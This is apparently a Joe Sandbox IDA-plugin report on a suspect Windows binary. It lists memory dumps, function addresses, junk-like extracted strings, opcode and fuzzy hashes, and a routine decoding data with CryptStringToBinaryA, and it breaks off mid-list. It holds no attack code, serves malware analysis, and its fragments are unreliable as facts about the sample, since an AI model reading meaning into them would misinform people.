Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $Gv$$Gv$:Ozm$DD$u$DP({$bo~$j8/}$tew
API String ID: 0-3911875129
Opcode ID: 654ebfca2d503b4092a1f40b2c3c0959840d67e6de678eb6967b22994b61e884
Instruction ID: 49ce68326a4cf2e22201904a575768a48edfaad9c3f1d6adeb57150802b8de88
Opcode Fuzzy Hash: 654ebfca2d503b4092a1f40b2c3c0959840d67e6de678eb6967b22994b61e884
Instruction Fuzzy Hash: A6B229F3A0C2049FE3046E2DEC85A7AFBE5EF94320F16863DEAC583744E67558058697

Function 00A5C4BD Relevance: 10.4, Strings: 7, Instructions: 1690COMMON

Download Yara Rule

Strings

*?D, xrefs: 00A5CFDF
kv;~, xrefs: 00A5C4DD
OgY, xrefs: 00A5D8D7
E.;o, xrefs: 00A5C94D
YNpq, xrefs: 00A5D04A
GJ_w, xrefs: 00A5D0A7
OgY, xrefs: 00A5D985

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *?D$E.;o$GJ_w$YNpq$kv;~$OgY$OgY
API String ID: 0-3578957929
Opcode ID: f670b5c2b06c195d6f25802f9abe71219ac5615c74c49a504e7641b7b052c009
Instruction ID: 4e0c3c6a0cbf65666331753afb65d3ff50d8e4e25b808f92cfb8eaca88240a19
Opcode Fuzzy Hash: f670b5c2b06c195d6f25802f9abe71219ac5615c74c49a504e7641b7b052c009
Instruction Fuzzy Hash: 45B23BF3A0C2109FE304AE2DDC8567AB7E9EF94720F1A853DEAC4C7744E93598018796

Function 00A6B612 Relevance: 10.3, Strings: 7, Instructions: 1576COMMON

Download Yara Rule

Strings

-?w, xrefs: 00A6BD0C
R__, xrefs: 00A6C5CB
F?)2, xrefs: 00A6BD7A
ncL], xrefs: 00A6B98A
2{, xrefs: 00A6C0A3
M=|, xrefs: 00A6BBC2
F?w, xrefs: 00A6BD07

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: -?w$2{$F?)2$F?w$M=|$ncL]$R__
API String ID: 0-3339608415
Opcode ID: 019862a5d13f295037e1efc835c1f4a5753f3291a3382f314d2755858120f226
Instruction ID: d8b9cf23e7068ee386ef780f3f949298e5b3d1e36587ec8657e4550f0080e005
Opcode Fuzzy Hash: 019862a5d13f295037e1efc835c1f4a5753f3291a3382f314d2755858120f226
Instruction Fuzzy Hash: 9EA206F360C204AFE3046E2DEC8567ABBE9EF94720F1A493DE6C4C7744EA3558058697

Function 00A61687 Relevance: 10.3, Strings: 7, Instructions: 1566COMMON

Download Yara Rule

Strings

ab}e, xrefs: 00A6269E
!{5;, xrefs: 00A61B24
._g, xrefs: 00A61A58
H5o, xrefs: 00A62478
Bkm, xrefs: 00A61C1E
*'{, xrefs: 00A61BD5
/r{_, xrefs: 00A61D80

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *'{$!{5;$._g$/r{_$ab}e$Bkm$H5o
API String ID: 0-3985290721
Opcode ID: 6d98baf5bbc1f9b5c6e81ea063e929b738a6a21c75199cbcba9649b4ec320c48
Instruction ID: 613b3526f58f9e2be3c8cfd76913522e725f4d3f1eecdaf4e29b7bf27c378f3a
Opcode Fuzzy Hash: 6d98baf5bbc1f9b5c6e81ea063e929b738a6a21c75199cbcba9649b4ec320c48
Instruction Fuzzy Hash: 47A2E4F3A0C204AFE704AE29DC85B7ABBE5EB94720F16493DEAC4C3744E63558058697

Function 00A5AA4F Relevance: 9.1, Strings: 6, Instructions: 1599COMMON

Download Yara Rule

Strings

>S~g, xrefs: 00A5B564
1g}, xrefs: 00A5B8B9
Bn#z, xrefs: 00A5B098
m6., xrefs: 00A5AA73
(^5, xrefs: 00A5AC89
fDcw, xrefs: 00A5B3D1

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: (^5$1g}$>S~g$Bn#z$fDcw$m6.
API String ID: 0-861809482
Opcode ID: afc92a0d8ca69ed149d56a4248601b28e37583d24294d46315cd633c483b5e2a
Instruction ID: 694bc27996318f3bbaa8fdaeee30d89688dc095970db15a4d561880026e35f53
Opcode Fuzzy Hash: afc92a0d8ca69ed149d56a4248601b28e37583d24294d46315cd633c483b5e2a
Instruction Fuzzy Hash: C4B2E7F3A0C200AFE3046E29DC8567AFBE9EF94720F1A853DE6C5C7744EA3558058697

Function 00699AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F

Strings

Ni, xrefs: 00699AD4, 00699AE1, 00699AF9, 00699B18, 00699AE4, 00699B1B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: Ni
API String ID: 4291131564-3198496747
Opcode ID: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
Instruction ID: f4e1168f5bc9028f53c60cdab7221c0d7ce12a954d783a6161080f66165f89bd
Opcode Fuzzy Hash: eb6a4721343d264f6d98f9c4ccae58de3d5a79b594e11595a6a6af99a5af1fe3
Instruction Fuzzy Hash: BF11A2B4241208AFEB14CF64DC95FAA77B9FB89700F208159FD159B394C7B6A901DBA0

Function 00A665F0 Relevance: 7.8, Strings: 5, Instructions: 1588COMMON

Download Yara Rule

Strings

]YO, xrefs: 00A669C6
^@G-, xrefs: 00A66959
AU{=, xrefs: 00A66710
!}[, xrefs: 00A67018
zw], xrefs: 00A66758

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !}[$AU{=$]YO$^@G-$zw]
API String ID: 0-3554914283
Opcode ID: b6eac62ac8877120838c396dff8a87d56cdc6d4ca93477ac2ae82a220c1b8b8e
Instruction ID: 21ed71ea45523dc3ad081b081db8a968ef2864791d52a071acd93f363f304346
Opcode Fuzzy Hash: b6eac62ac8877120838c396dff8a87d56cdc6d4ca93477ac2ae82a220c1b8b8e
Instruction Fuzzy Hash: 0BB2D6F3A0C2009FE304AE29EC4567AFBE5EF94720F16492DEAC4C7744EA3598458797

Function 00A71F84 Relevance: 7.8, Strings: 5, Instructions: 1545COMMON

Download Yara Rule

Strings

?67-, xrefs: 00A72932
?67-, xrefs: 00A72942
M(_, xrefs: 00A731AF
^N^~, xrefs: 00A72DA5
!q:d, xrefs: 00A72F10

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !q:d$?67-$?67-$^N^~$M(_
API String ID: 0-1818730486
Opcode ID: 72908e38990931bd8456e2adf7b4296f1d141cb14bffe6f282e63b3d87808ff9
Instruction ID: 9668539c54275a3bc5e1c61eeaf9a9e01b6059e6e62d4b712d94170209530144
Opcode Fuzzy Hash: 72908e38990931bd8456e2adf7b4296f1d141cb14bffe6f282e63b3d87808ff9
Instruction Fuzzy Hash: 6EB2D3F360C200AFE304AE29EC8567ABBE5EF94720F16493DEAC4C7744E63598458797

Function 00A70653 Relevance: 7.8, Strings: 5, Instructions: 1519COMMON

Download Yara Rule

Strings

xc? , xrefs: 00A71285
bk6, xrefs: 00A712ED
CNn#, xrefs: 00A71578
_z1, xrefs: 00A70F89
5A}, xrefs: 00A709DB

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
